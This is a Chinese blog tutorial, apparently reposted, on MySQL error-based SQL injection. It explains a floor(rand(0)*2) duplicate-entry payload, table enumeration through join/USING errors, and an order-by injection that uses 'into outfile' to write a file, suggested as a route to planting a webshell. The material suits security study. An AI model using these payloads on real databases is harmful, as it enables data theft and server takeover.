0x1
mysql报错模式下的不使用information_schema来爆表
基础知识:USING
用于表连接时给定连接条件,Select * from table1 join table2 on table1.id = table2.id;使用using可以写为Select *from table1 join table2 using(id)(不过下面的语句我用on A.user=B.user时不会出现想要的结果)
这里说是要有一个别名,那么如下写就可以了:
又提示说是重复的列Host,那么我们用Host来连接两个表。可见有爆出User表
…
那么接下来就可以爆出数据库中的所有的表了,当然也可以爆其他的。
0x2
select 1 from(selectcount(*),concat(version(),floor(rand(0)*2))x from information_schema.tablesgroup by x)a;
RAND(N) :返回在范围0到1.0内的随机浮点值。如果一个整数参数N被指定,它被用作种子值。每个种子产生的随机数序列是不同的
Floor():向下舍入为最接近的整数。
其实这个select语句最重要的部分是:
select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tablesgroup by x;
下面将语句拆开查看
select count(*) from information_schema.tables;#只返回一行数据
select concat(version(),floor(rand(0)*2))x from information_schema.tables;#返回62行数据
select concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;#返回两行数据,这个和rand(0)*2)后面的2有关,乘以n一般就是返回n行数据。
原因应该可以从上面找出点猫腻。第一个select语句有1列,第二个有62列,floor(rand(0)*2)说明可以有两个分组,而第二个分组就无法进行了,所以出现如上“Duplicate entry '5.0.90-community-nt1' for key 1”错误。现在看想出这个利用方法的人真是牛x。
这个语句用处还是很大的,在insert、order by的注入点上还是很有用的。
0x3
select user from user order by if(( select 'abc' into outfile 'c:/1.php'),1,1);
可见这条语句将user表中user字段都写到1.php文件里面了,但是abc没有写进去。具体原因还没找出来。这里我们可以假设一个yy的场景,root权限+可以发表文章(或者提交的数据被写入到数据库中)+order by的注入点,那么我就可以通过上面的语句来导出一句话。
0x4
参考
http://www.blackhat.com/presentations/bh-usa-09/DZULFAKAR/BHUSA09-Dzulfakar-MySQLExploit-PAPER.pdf
http://www.exploit-db.com/papers/13604/
http://www.ptsecurity.com/download/PT-devteev-FAST-blind-SQL-Injection.pdf
http://hi.baidu.com/toby57/item/e71e828cd9fe54874514cf37
by qingshen
转自:http://hi.baidu.com/qingsh4n/item/831db5c56d127900b77a2458